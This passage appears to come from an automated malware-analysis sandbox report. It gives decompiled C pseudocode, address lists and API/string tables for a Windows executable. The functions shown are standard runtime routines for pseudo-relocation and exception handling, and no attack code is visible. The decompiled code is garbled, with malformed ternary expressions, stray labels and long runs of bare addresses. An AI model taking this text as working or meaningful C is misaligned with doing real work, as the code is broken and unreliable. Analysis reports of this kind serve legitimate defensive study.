													} else {
														L49:
														__eflags = _t91;
														if(_t91 == 0) {
															goto L58;
														} else {
															 *_t91();
															__eflags = 0;
															return 0;
														}
													}
												} else {
													__eflags = _t37 - 0xc0000008;
													if(__eflags == 0) {
														L60:
														__eflags = 0;
														return 0;
													} else {
														if(__eflags > 0) {
															__eflags = _t37 - 0xc000001d;
															if(_t37 == 0xc000001d) {
																L53:
																L00402A98();
																__eflags = _t91 - 1;
																if(_t91 == 1) {
																	L00402A98();
																	_t41 = 0;
																	goto L43;
																} else {
																	__eflags = _t91;
																	if(_t91 == 0) {
																		goto L65;
																	} else {
																		 *_t91();
																		__eflags = 0;
																		return 0;
																	}
																}
															} else {
																__eflags = _t37 - 0xc000008c;
																if(_t37 == 0xc000008c) {
																	goto L60;
																} else {
																	goto L58;
																}
															}
														} else {
															__eflags = _t37 - 0x80000002;
															if(_t37 == 0x80000002) {
																goto L60;
															} else {
																__eflags = _t37 - 0xc0000005;
																if(_t37 != 0xc0000005) {
																	L58:
																	return 1;
																} else {
																	L00402A98();
																	__eflags = _t91 - 1;
																	if(_t91 == 1) {
																		L00402A98();
																		_t41 = 0;
																	} else {
																		__eflags = _t91;
																		if(_t91 == 0) {
																			L65:
																			_t41 = 4;
																		} else {
																			 *_t91();
																			_t41 = 0;
																			__eflags = 0;
																		}
																	}
																	L43:
																	return _t41;
																}
															}
														}
													}
												}
											}
										} else {
											_t151 =  *0x4053a0; // 0x400000
											_t114 = _t114 + 0xc;
											_t155 = _t117 - 0x58;
											__eflags = _t114 - _t141;
											if(_t114 < _t141) {
												do {
													_t25 = _t114 + 8; // 0x297463656a6f7270
													_t78 =  *_t25 & 0x000000ff;
													_t96 = _t96 + _t151;
													_t91 = _t91 + _t151;
													__eflags = _t78 - 0x10;
													_t134 =  *_t91;
													if(__eflags != 0) {
														if(__eflags <= 0) {
															__eflags = _t78 - 8;
															if(__eflags != 0) {
																goto L33;
															} else {
																r8d =  *_t96 & 0x000000ff;
																_t100 = _t155;
																_t112 = _t155;
																__eflags = r8b;
																_t130 =  <  ? _t129 | 0xffffff00 : _t129;
																_t131 = ( <  ? _t129 | 0xffffff00 : _t129) - _t91;
																_t129 = ( <  ? _t129 | 0xffffff00 : _t129) - _t91 + _t134;
																 *(_t117 - 0x58) = _t129;
																r8d = 1;
																E00401AE0(_t81, _t82, _t94, _t96, _t100, _t155, _t114, _t129, _t141, _t151, _t155, 0);
																goto L27;
															}
														} else {
															__eflags = _t78 - 0x20;
															if(_t78 == 0x20) {
																_t112 = _t155;
																_t129 = _t100;
																__eflags = r8d;
																_t104 =  >=  ? _t129 : _t100 | 0x00000000;
																r8d = 4;
																_t105 = ( >=  ? _t129 : _t100 | 0x00000000) - _t91;
																_t106 = ( >=  ? _t129 : _t100 | 0x00000000) - _t91 + _t134;
																 *(_t117 - 0x58) = ( >=  ? _t129 : _t100 | 0x00000000) - _t91 + _t134;
																_t100 = _t155;
																E00401AE0(_t81, _t82, _t94, _t96, _t100, _t155, _t114, _t129, _t141, _t151, _t155, 0);
																goto L27;
															} else {
																__eflags = _t78 - 0x40;
																if(__eflags != 0) {
																	L33:
																	 *(_t117 - 0x58) = 0;
																	E00402C80(__eflags, _t94, "  Unknown pseudo relocation bit size %d.\n", _t100, _t114, _t129, _t134);
																	goto L34;
																} else {
																	r8d = 8;
																	_t112 = _t155;
																	_t109 =  *_t96 - _t91 + _t134;
																	__eflags = _t109;
																	 *(_t117 - 0x58) = _t109;
																	_t100 = _t155;
																	E00401AE0(_t81, _t82, _t94, _t96, _t100, _t155, _t114, _t129, _t141, _t151, _t155, 0);
																	goto L27;
																}
															}
														}
													} else {
														r8d =  *_t96 & 0x0000ffff;
														_t100 = _t155;
														_t112 = _t155;
														__eflags = r8w;
														_t132 =  <  ? _t129 | 0xffff0000 : _t129;
														_t133 = ( <  ? _t129 | 0xffff0000 : _t129) - _t91;
														_t129 = ( <  ? _t129 | 0xffff0000 : _t129) - _t91 + _t134;
														 *(_t117 - 0x58) = _t129;
														r8d = 2;
														E00401AE0(_t81, _t82, _t94, _t96, _t100, _t155, _t114, _t129, _t141, _t151, _t155, 0);
														goto L27;
													}
													goto L66;
													L27:
													_t114 = _t114 + 0xc;
													__eflags = _t114 - _t141;
												} while (_t114 < _t141);
												goto L9;
											} else {
												goto L1;
											}
										}
									} else {
										_t19 = _t114 + 0xc; // 0x0
										_t68 =  *_t19;
										_t114 = _t114 + 0xc;
										__eflags = _t114;
										goto L18;
									}
								}
							} else {
								L5:
								__eflags = _t114 - _t141;
								if(_t114 < _t141) {
									_t8 = _t114 + 8; // 0x405538
									_t154 = _t8;
									_t150 =  *0x4053a0; // 0x400000
									_t112 = _t117 - 0x58;
									_t11 = (_t141 + 7 - _t154 >> 3) * 8; // 0x405538
									_t146 = _t114 + _t11 + 8;
									while(1) {
										r8d = 4;
										_t33 =  *_t114;
										_t114 = _t154;
										_t96 = _t96 + _t150;
										 *(_t117 - 0x58) = _t33 +  *_t96;
										E00401AE0(_t81, _t82, _t94, _t96, _t112, _t112, _t114, _t129, _t146, _t150, _t154, _t156);
										__eflags = _t154 - _t146;
										if(_t154 == _t146) {
											break;
										}
										_t154 = _t154 + 8;
										__eflags = _t154;
									}
									L9:
									_t30 =  *0x408624;
									__eflags = _t30;
									if(_t30 > 0) {
										do {
											r8d =  *( *0x408628 + _t114);
											__eflags = r8d;
											if(r8d != 0) {
												Sleep();
											}
											_t53 = _t53 + 1;
											_t114 = _t114 + 0x28;
											__eflags = _t53 -  *0x408624;
										} while (_t53 <  *0x408624);
									}
								}
								goto L1;
							}
						}
					}
				} else {
					L1:
					return _t30;
				}
				L66:
			}






























                                          0x00401cb0
                                          0x00401cb0
                                          0x00401cb0
                                          0x00401cb0
                                          0x00401cb0
                                          0x00401cb0
                                          0x00401cb1
                                          0x00401cbb
                                          0x00401cbc
                                          0x00401cc0
                                          0x00401cc8
                                          0x00401cd0
                                          0x00401ce3
                                          0x00401ced
                                          0x00401d04
                                          0x00401d09
                                          0x00401d10
                                          0x00401d1a
                                          0x00401d29
                                          0x00401d33
                                          0x00401d36
                                          0x00401d3a
                                          0x00000000
                                          0x00401d3c
                                          0x00401d3c
                                          0x00401d40
                                          0x00401d42
                                          0x00401e10
                                          0x00401e10
                                          0x00401e12
                                          0x00000000
                                          0x00401e18
                                          0x00401e18
                                          0x00401e18
                                          0x00401e1b
                                          0x00401e1d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00401e1d
                                          0x00401d48
                                          0x00401d48
                                          0x00401d4a
                                          0x00401df4
                                          0x00401df7
                                          0x00401df9
                                          0x00000000
                                          0x00401dff
                                          0x00401dff
                                          0x00401e02
                                          0x00401e04
                                          0x00401e23
                                          0x00401e23
                                          0x00401e26
                                          0x00401e29
                                          0x00401f5e
                                          0x00401f5e
                                          0x00401f65
                                          0x00401f74
                                          0x00401f76
                                          0x00401f7b
                                          0x00401fe0
                                          0x00401fe5
                                          0x004020a7
                                          0x004020ac
                                          0x004020b0
                                          0x00000000
                                          0x004020b6
                                          0x004020c0
                                          0x004020c5
                                          0x00000000
                                          0x004020c5
                                          0x00401feb
                                          0x00401feb
                                          0x00402024
                                          0x00402029
                                          0x00000000
                                          0x0040202b
                                          0x0040202b
                                          0x00402030
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402030
                                          0x00401fed
                                          0x00401fed
                                          0x00401ff2
                                          0x00000000
                                          0x00401ff8
                                          0x00401ff8
                                          0x00401ffd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00401ffd
                                          0x00401ff2
                                          0x00401feb
                                          0x00401f7d
                                          0x00401f7d
                                          0x00401f82
                                          0x00401fff
                                          0x00402006
                                          0x0040200b
                                          0x0040200f
                                          0x0040208a
                                          0x0040208f
                                          0x00000000
                                          0x00402011
                                          0x00402011
                                          0x00402011
                                          0x00402014
                                          0x00000000
                                          0x00402016
                                          0x0040201b
                                          0x0040201d
                                          0x00402023
                                          0x00402023
                                          0x00402014
                                          0x00401f84
                                          0x00401f84
                                          0x00401f89
                                          0x00402094
                                          0x00402094
                                          0x0040209a
                                          0x00401f8f
                                          0x00401f8f
                                          0x00402060
                                          0x00402065
                                          0x00402032
                                          0x00402039
                                          0x0040203e
                                          0x00402042
                                          0x004020da
                                          0x004020df
                                          0x00000000
                                          0x00402048
                                          0x00402048
                                          0x0040204b
                                          0x00000000
                                          0x00402051
                                          0x00402056
                                          0x00402058
                                          0x0040205e
                                          0x0040205e
                                          0x0040204b
                                          0x00402067
                                          0x00402067
                                          0x0040206c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040206c
                                          0x00401f95
                                          0x00401f95
                                          0x00401f9a
                                          0x00000000
                                          0x00401fa0
                                          0x00401fa0
                                          0x00401fa5
                                          0x0040206e
                                          0x00402077
                                          0x00401fab
                                          0x00401fb2
                                          0x00401fb7
                                          0x00401fbb
                                          0x004020fa
                                          0x004020ff
                                          0x00401fc1
                                          0x00401fc1
                                          0x00401fc4
                                          0x00402106
                                          0x00402106
                                          0x00401fca
                                          0x00401fcf
                                          0x00401fd1
                                          0x00401fd1
                                          0x00401fd1
                                          0x00401fc4
                                          0x00401fd3
                                          0x00401fd7
                                          0x00401fd7
                                          0x00401fa5
                                          0x00401f9a
                                          0x00401f8f
                                          0x00401f89
                                          0x00401f82
                                          0x00401e2f
                                          0x00401e2f
                                          0x00401e36
                                          0x00401e44
                                          0x00401e48
                                          0x00401e4b
                                          0x00401e95
                                          0x00401e9a
                                          0x00401e9a
                                          0x00401e9e
                                          0x00401ea1
                                          0x00401ea4
                                          0x00401ea7
                                          0x00401eaa
                                          0x00401e52
                                          0x00401f10
                                          0x00401f13
                                          0x00000000
                                          0x00401f15
                                          0x00401f15
                                          0x00401f19
                                          0x00401f1c
                                          0x00401f29
                                          0x00401f2c
                                          0x00401f30
                                          0x00401f33
                                          0x00401f36
                                          0x00401f3a
                                          0x00401f40
                                          0x00000000
                                          0x00401f40
                                          0x00401e58
                                          0x00401e58
                                          0x00401e5b
                                          0x00401ee2
                                          0x00401ee5
                                          0x00401eeb
                                          0x00401eee
                                          0x00401ef2
                                          0x00401ef8
                                          0x00401efb
                                          0x00401efe
                                          0x00401f02
                                          0x00401f05
                                          0x00000000
                                          0x00401e61
                                          0x00401e61
                                          0x00401e64
                                          0x00401f4a
                                          0x00401f51
                                          0x00401f59
                                          0x00000000
                                          0x00401e6a
                                          0x00401e6d
                                          0x00401e73
                                          0x00401e79
                                          0x00401e79
                                          0x00401e7c
                                          0x00401e80
                                          0x00401e83
                                          0x00000000
                                          0x00401e83
                                          0x00401e64
                                          0x00401e5b
                                          0x00401eac
                                          0x00401eac
                                          0x00401eb0
                                          0x00401eb3
                                          0x00401ec0
                                          0x00401ec4
                                          0x00401ec8
                                          0x00401ecb
                                          0x00401ece
                                          0x00401ed2
                                          0x00401ed8
                                          0x00000000
                                          0x00401ed8
                                          0x00000000
                                          0x00401e88
                                          0x00401e88
                                          0x00401e8c
                                          0x00401e8c
                                          0x00000000
                                          0x00401e4d
                                          0x00000000
                                          0x00401e4d
                                          0x00401e4b
                                          0x00401e06
                                          0x00401e06
                                          0x00401e06
                                          0x00401e09
                                          0x00401e09
                                          0x00000000
                                          0x00401e09
                                          0x00401e04
                                          0x00401d50
                                          0x00401d50
                                          0x00401d50
                                          0x00401d53
                                          0x00401d59
                                          0x00401d59
                                          0x00401d61
                                          0x00401d68
                                          0x00401d73
                                          0x00401d73
                                          0x00401d84
                                          0x00401d87
                                          0x00401d90
                                          0x00401d92
                                          0x00401d95
                                          0x00401d9a
                                          0x00401d9d
                                          0x00401da2
                                          0x00401da5
                                          0x00000000
                                          0x00000000
                                          0x00401d80
                                          0x00401d80
                                          0x00401d80
                                          0x00401da7
                                          0x00401da7
                                          0x00401db6
                                          0x00401db8
                                          0x00401dc0
                                          0x00401dca
                                          0x00401dcd
                                          0x00401dd0
                                          0x00401ddd
                                          0x00401ddd
                                          0x00401de0
                                          0x00401de3
                                          0x00401de7
                                          0x00401de7
                                          0x00401def
                                          0x00401db8
                                          0x00000000
                                          0x00401d53
                                          0x00401d4a
                                          0x00401d42
                                          0x00401cd2
                                          0x00401cd2
                                          0x00401ce2
                                          0x00401ce2
                                          0x00000000

                                          APIs
                                          • Sleep.KERNEL32(00408610,00007FFA9B2D3CA0,?,?,?,00000001,0040124C), ref: 00401DDD
                                          Strings
                                          • 0U@, xrefs: 00401D09
                                          • Unknown pseudo relocation bit size %d., xrefs: 00401F4A
                                          • 0U@, xrefs: 00401D1A
                                          • Unknown pseudo relocation protocol version %d., xrefs: 00401F5E
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.228347104.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.228341440.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228352803.0000000000404000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228359069.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228364492.000000000040C000.00000020.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228368923.000000000040D000.00000080.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$0U@$0U@
                                          • API String ID: 3472027048-2565208634
                                          • Opcode ID: 35809382daa3f3aabf8046ee28cd3e81593fbe4217582cfbc2d6b3a461b03210
                                          • Instruction ID: 9fbbe4c45a224cdb08e94c447065932ba1ef2da85d1eab15b035e2c1e6db0a3b
                                          • Opcode Fuzzy Hash: 35809382daa3f3aabf8046ee28cd3e81593fbe4217582cfbc2d6b3a461b03210
                                          • Instruction Fuzzy Hash: 82914571B006414AEB2897A6CA8871F6352BB447A8F54853BDF09B77E4DA7DC882C709
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402200, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 111COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E00402200(long long* __rax, intOrPtr* __rcx) {
				signed int _t3;
				void* _t40;
				void* _t46;
				signed int* _t55;
				void* _t56;

				_t51 = __rax;
				_t55 =  *((intOrPtr*)(__rcx));
				_t3 =  *_t55;
				if((_t3 & 0x20ffffff) == 0x20474343) {
					if((_t55[1] & 0x00000001) != 0) {
						goto L1;
					}
				} else {
					L1:
					if(_t3 > 0xc0000091) {
						_t46 = _t3 - 0xc0000094;
						if(_t46 == 0) {
							L00402A98();
							if(_t51 != 1) {
								goto L16;
							}
							L00402A98();
							return 0xffffffff;
						}
						if(_t46 > 0) {
							if(_t3 != 0xc0000095) {
								if(_t3 != 0xc0000096) {
									goto L9;
								}
								goto L23;
							}
						} else {
							if(_t3 != 0xc0000092) {
								if(_t3 != 0xc0000093) {
									goto L9;
								}
								goto L15;
							}
						}
					} else {
						if(_t3 >= 0xc000008d) {
							L15:
							L00402A98();
							if(_t51 != 1) {
								L16:
								if(_t51 == 0) {
									goto L9;
								}
								 *_t51();
								return 0xffffffff;
							}
							L00402A98();
							E00401AB0(_t3);
						} else {
							_t40 = _t3 - 0xc0000008;
							if(_t40 != 0) {
								if(_t40 > 0) {
									if(_t3 == 0xc000001d) {
										L23:
										L00402A98();
										if(_t51 == 1) {
											L00402A98();
											return _t3 | 0xffffffff;
										}
										if(_t51 == 0) {
											goto L9;
										}
										 *_t51();
										return 0xffffffff;
									}
									if(_t3 != 0xc000008c) {
										goto L9;
									}
								} else {
									if(_t3 != 0x80000002) {
										if(_t3 != 0xc0000005) {
											L9:
											_t51 =  *0x408640;
											if( *0x408640 == 0) {
												return 0;
											}
											_t56 = _t56 + 0x20;
											goto __rax;
										}
										L00402A98();
										if(_t51 == 1) {
											L00402A98();
											return _t3 | 0xffffffff;
										}
										if(_t51 != 0) {
											 *_t51();
											return 0xffffffff;
										}
										goto L9;
									}
								}
							}
						}
					}
				}
				return 0xffffffff;
			}








                                          0x00402200
                                          0x00402205
                                          0x00402208
                                          0x0040221b
                                          0x004022e4
                                          0x00000000
                                          0x00000000
                                          0x00402221
                                          0x00402221
                                          0x00402226
                                          0x00402290
                                          0x00402295
                                          0x00402357
                                          0x00402360
                                          0x00000000
                                          0x00000000
                                          0x00402370
                                          0x00000000
                                          0x00402375
                                          0x0040229b
                                          0x004022fa
                                          0x00402301
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402301
                                          0x0040229d
                                          0x004022a2
                                          0x004022a9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004022a9
                                          0x004022a2
                                          0x00402228
                                          0x0040222d
                                          0x004022ab
                                          0x004022b2
                                          0x004022bb
                                          0x004022c1
                                          0x004022c4
                                          0x00000000
                                          0x00000000
                                          0x004022cb
                                          0x00000000
                                          0x004022cd
                                          0x004023aa
                                          0x004023af
                                          0x0040222f
                                          0x0040222f
                                          0x00402234
                                          0x0040223a
                                          0x00402339
                                          0x00402307
                                          0x0040230e
                                          0x00402317
                                          0x004023da
                                          0x00000000
                                          0x004023df
                                          0x00402320
                                          0x00000000
                                          0x00000000
                                          0x0040232b
                                          0x00000000
                                          0x0040232d
                                          0x00402340
                                          0x00000000
                                          0x00000000
                                          0x00402240
                                          0x00402245
                                          0x00402250
                                          0x00402271
                                          0x00402271
                                          0x0040227b
                                          0x00000000
                                          0x00402391
                                          0x00402284
                                          0x00402289
                                          0x00402289
                                          0x00402259
                                          0x00402262
                                          0x004023c3
                                          0x00000000
                                          0x004023c8
                                          0x0040226b
                                          0x00402385
                                          0x00000000
                                          0x00402387
                                          0x00000000
                                          0x0040226b
                                          0x00402245
                                          0x0040223a
                                          0x00402234
                                          0x0040222d
                                          0x00402226
                                          0x004022f4

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.228347104.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.228341440.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228352803.0000000000404000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228359069.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228364492.000000000040C000.00000020.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228368923.000000000040D000.00000080.00020000.sdmp Download File
                                          Similarity
                                          • API ID: signal
                                          • String ID: CCG
                                          • API String ID: 1946981877-1584390748
                                          • Opcode ID: 6926d94dbed4615ad9b77912a540b3642e048262b7094e941b76bae57c5588d7
                                          • Instruction ID: 4563d50f74bbd33bfeba428f1c477bcf437d311cc7f4c27676f25da194ef2638
                                          • Opcode Fuzzy Hash: 6926d94dbed4615ad9b77912a540b3642e048262b7094e941b76bae57c5588d7
                                          • Instruction Fuzzy Hash: 04314E2070450146EE7852FA876C33A11015B9A338F298B7F9E6EB63E6CDFD88D1521E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401790, Relevance: 12.0, APIs: 8, Instructions: 50sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.228347104.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.228341440.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228352803.0000000000404000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228359069.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228364492.000000000040C000.00000020.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228368923.000000000040D000.00000080.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Sleep$abort
                                          • String ID:
                                          • API String ID: 2201833521-0
                                          • Opcode ID: 7449813c3f9201b011f7a43015cedf9fd23764b883aa728f667232120048ee82
                                          • Instruction ID: 1b36645976eea770ab519835620da7cfc5787177021e439604ed77af465cf9a6
                                          • Opcode Fuzzy Hash: 7449813c3f9201b011f7a43015cedf9fd23764b883aa728f667232120048ee82
                                          • Instruction Fuzzy Hash: 1F2102B1611F44E9EB009B61FC8479A37A4F708B84F44462ADB8E67775EF38C55AC308
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401AE0, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 148sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E00401AE0(signed int __edi, signed int __esi, void* __rbx, signed long long __rcx, signed char* __rdx, void* __rdi, void* __rsi, signed long long __r8, void* __r12, void* __r13, void* __r14, void* __r15) {
				signed int _t67;
				signed int _t70;
				intOrPtr _t74;
				signed int _t78;
				signed int _t92;
				signed int _t93;
				signed int _t97;
				void* _t113;
				signed int _t114;
				signed int _t124;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				signed long long _t151;
				intOrPtr* _t157;
				signed int* _t161;
				intOrPtr* _t162;
				signed long long _t165;
				signed long long _t169;
				signed short* _t170;
				intOrPtr* _t172;
				signed long long _t180;
				signed long long _t189;
				void* _t190;
				long long _t191;
				intOrPtr _t193;
				signed long long _t196;
				signed long long _t201;
				signed int _t202;
				void* _t206;
				signed char* _t208;
				void* _t209;
				void* _t212;
				void* _t213;
				void* _t214;
				signed long long _t224;
				intOrPtr _t229;
				void* _t231;
				signed long long _t237;
				intOrPtr _t238;
				void* _t243;
				void* _t246;
				intOrPtr _t248;
				intOrPtr _t249;
				void* _t250;
				signed int _t252;
				signed long long _t253;
				void* _t254;

				_t254 = __r15;
				_t250 = __r14;
				_t246 = __r13;
				_t224 = __r8;
				_t135 = __esi;
				_t132 = __edi;
				_push(__rsi);
				_push(__rbx);
				_t213 = _t212 - 0x50;
				_t201 =  *0x408624;
				_t165 = __rcx;
				_t208 = __rdx;
				_t196 = __r8;
				if(__esi <= 0) {
					_t135 = 0;
					goto L5;
				} else {
					_t113 = 0;
					_t162 =  *0x408628 + 0x18;
					do {
						_t193 =  *_t162;
						if(_t165 < _t193) {
							goto L4;
						} else {
							_t224 =  *((intOrPtr*)(_t162 + 8));
							r8d =  *(_t224 + 8);
							if(_t165 < _t193 + _t224) {
								L10:
								if(_t132 >= 8) {
									_t92 = _t132;
									_t133 = _t132 - 1;
									_t191 = _t208[_t162 - 8];
									__eflags = _t133 - 8;
									 *((long long*)(_t165 + _t162 - 8)) = _t191;
									if(_t133 >= 8) {
										_t134 = _t133 & 0xfffffff8;
										_t93 = 0;
										__eflags = 0;
										do {
											_t93 = _t93 + 8;
											__eflags = _t93 - _t134;
											 *((long long*)(_t165 + _t191)) = _t208[_t191];
										} while (_t93 < _t134);
									}
								} else {
									if((dil & 0x00000004) != 0) {
										L21:
										 *_t165 =  *_t208;
										_t92 = _t208[_t196 - 4];
										 *(_t165 + _t196 - 4) = _t92;
									} else {
										if(_t132 != 0) {
											_t92 =  *_t208 & 0x000000ff;
											 *_t165 = _t92;
											if((dil & 0x00000002) != 0) {
												_t92 = _t208[_t196 - 2] & 0x0000ffff;
												 *(_t165 + _t196 - 2) = _t92;
											}
										}
									}
								}
								L14:
								return _t92;
							} else {
								goto L4;
							}
						}
						goto L92;
						L4:
						_t113 = _t113 + 1;
						_t162 = _t162 + 0x28;
					} while (_t113 != _t135);
					L5:
					_t169 = _t165;
					E00402780(_t169);
					_t237 = _t151;
					if(_t151 == 0) {
						L25:
						_t170 = "Address %p has no image-section";
						_t180 = _t165;
						_t67 = E00402C80(__eflags, _t165, _t170, _t180, _t201, _t224, _t229);
						_push(_t208);
						_push(_t254);
						_push(_t250);
						_push(_t246);
						_push(_t237);
						_push(_t196);
						_push(_t201);
						_push(_t165);
						_t214 = _t213 - 0x38;
						_t209 = _t214 + 0x80;
						_t97 =  *0x408620;
						__eflags = _t97;
						if(_t97 == 0) {
							 *0x408620 = 1;
							E00402800();
							_t67 = E00402A40(_t151);
							_t238 =  *0x405370; // 0x405530
							 *0x408624 = 0;
							_t202 =  *0x405380; // 0x405530
							 *0x408628 = _t214 - (0x0000001e + (_t151 + _t151 * 0x00000004) * 0x00000008 & 0xfffffff0) + 0x20;
							_t157 = _t238 - _t202;
							__eflags = _t157 - 7;
							if(_t157 <= 7) {
								goto L27;
							} else {
								__eflags = _t157 - 0xb;
								_t114 =  *_t202;
								if(_t157 <= 0xb) {
									L44:
									__eflags = _t114;
									if(_t114 != 0) {
										goto L31;
									} else {
										_t56 = _t202 + 4; // 0x302e312e3820
										_t67 =  *_t56;
										__eflags = _t67;
										if(_t67 != 0) {
											goto L31;
										} else {
											goto L46;
										}
									}
								} else {
									__eflags = _t114;
									if(_t114 == 0) {
										_t53 = _t202 + 4; // 0x0
										__eflags =  *_t53;
										if( *_t53 != 0) {
											goto L31;
										} else {
											_t54 = _t202 + 8; // 0x0
											__eflags =  *_t54;
											if( *_t54 != 0) {
												L46:
												_t57 = _t202 + 8; // 0x302e
												__eflags =  *_t57 - 1;
												if(__eflags != 0) {
													L60:
													_t172 = "  Unknown pseudo relocation protocol version %d.\n";
													E00402C80(__eflags, _t165, _t172, _t180, _t202, _t224, _t229);
													_t74 =  *_t172;
													__eflags = _t74 - 0xc0000091;
													if(_t74 > 0xc0000091) {
														__eflags = _t74 - 0xc0000094;
														if(__eflags == 0) {
															L00402A98();
															__eflags = _t157 - 1;
															if(_t157 != 1) {
																goto L75;
															} else {
																L00402A98();
																_t78 = 0;
																goto L69;
															}
														} else {
															if(__eflags > 0) {
																__eflags = _t74 - 0xc0000095;
																if(_t74 == 0xc0000095) {
																	goto L86;
																} else {
																	__eflags = _t74 - 0xc0000096;
																	if(_t74 != 0xc0000096) {
																		goto L84;
																	} else {
																		goto L79;
																	}
																}
															} else {
																__eflags = _t74 - 0xc0000092;
																if(_t74 == 0xc0000092) {
																	goto L86;
																} else {
																	__eflags = _t74 - 0xc0000093;
																	if(_t74 != 0xc0000093) {
																		goto L84;
																	} else {
																		goto L74;
																	}
																}
															}
														}
													} else {
														__eflags = _t74 - 0xc000008d;
														if(_t74 >= 0xc000008d) {
															L74:
															L00402A98();
															__eflags = _t157 - 1;
															if(_t157 == 1) {
																L00402A98();
																E00401AB0(_t74);
																goto L86;
															} else {
																L75:
																__eflags = _t157;
																if(_t157 == 0) {
																	goto L84;
																} else {
																	 *_t157();
																	__eflags = 0;
																	return 0;
																}
															}
														} else {
															__eflags = _t74 - 0xc0000008;
															if(__eflags == 0) {
																L86:
																__eflags = 0;
																return 0;
															} else {
																if(__eflags > 0) {
																	__eflags = _t74 - 0xc000001d;
																	if(_t74 == 0xc000001d) {
																		L79:
																		L00402A98();
																		__eflags = _t157 - 1;
																		if(_t157 == 1) {
																			L00402A98();
																			_t78 = 0;
																			goto L69;
																		} else {
																			__eflags = _t157;
																			if(_t157 == 0) {
																				goto L91;
																			} else {
																				 *_t157();
																				__eflags = 0;
																				return 0;
																			}
																		}
																	} else {
																		__eflags = _t74 - 0xc000008c;
																		if(_t74 == 0xc000008c) {
																			goto L86;
																		} else {
																			goto L84;
																		}
																	}
																} else {
																	__eflags = _t74 - 0x80000002;
																	if(_t74 == 0x80000002) {
																		goto L86;
																	} else {
																		__eflags = _t74 - 0xc0000005;
																		if(_t74 != 0xc0000005) {
																			L84:
																			return 1;
																		} else {
																			L00402A98();
																			__eflags = _t157 - 1;
																			if(_t157 == 1) {
																				L00402A98();
																				_t78 = 0;
																			} else {
																				__eflags = _t157;
																				if(_t157 == 0) {
																					L91:
																					_t78 = 4;
																				} else {
																					 *_t157();
																					_t78 = 0;
																					__eflags = 0;
																				}
																			}
																			L69:
																			return _t78;
																		}
																	}
																}
															}
														}
													}
												} else {
													_t249 =  *0x4053a0; // 0x400000
													_t202 = _t202 + 0xc;
													_t253 = _t209 - 0x58;
													__eflags = _t202 - _t238;
													if(_t202 < _t238) {
														do {
															_t61 = _t202 + 8; // 0x297463656a6f7270
															_t124 =  *_t61 & 0x000000ff;
															_t170 = _t170 + _t249;
															_t157 = _t157 + _t249;
															__eflags = _t124 - 0x10;
															_t229 =  *_t157;
															if(__eflags != 0) {
																if(__eflags <= 0) {
																	__eflags = _t124 - 8;
																	if(__eflags != 0) {
																		goto L59;
																	} else {
																		r8d =  *_t170 & 0x000000ff;
																		_t180 = _t253;
																		_t198 = _t253;
																		__eflags = r8b;
																		_t225 =  <  ? _t224 | 0xffffff00 : _t224;
																		_t226 = ( <  ? _t224 | 0xffffff00 : _t224) - _t157;
																		_t224 = ( <  ? _t224 | 0xffffff00 : _t224) - _t157 + _t229;
																		 *(_t209 - 0x58) = _t224;
																		r8d = 1;
																		E00401AE0(_t132, _t135, _t165, _t170, _t180, _t253, _t202, _t224, _t238, _t249, _t253, 0);
																		goto L53;
																	}
																} else {
																	__eflags = _t124 - 0x20;
																	if(_t124 == 0x20) {
																		_t198 = _t253;
																		_t224 = _t180;
																		__eflags = r8d;
																		_t184 =  >=  ? _t224 : _t180 | 0x00000000;
																		r8d = 4;
																		_t185 = ( >=  ? _t224 : _t180 | 0x00000000) - _t157;
																		_t186 = ( >=  ? _t224 : _t180 | 0x00000000) - _t157 + _t229;
																		 *(_t209 - 0x58) = ( >=  ? _t224 : _t180 | 0x00000000) - _t157 + _t229;
																		_t180 = _t253;
																		E00401AE0(_t132, _t135, _t165, _t170, _t180, _t253, _t202, _t224, _t238, _t249, _t253, 0);
																		goto L53;
																	} else {
																		__eflags = _t124 - 0x40;
																		if(__eflags != 0) {
																			L59:
																			 *(_t209 - 0x58) = 0;
																			E00402C80(__eflags, _t165, "  Unknown pseudo relocation bit size %d.\n", _t180, _t202, _t224, _t229);
																			goto L60;
																		} else {
																			r8d = 8;
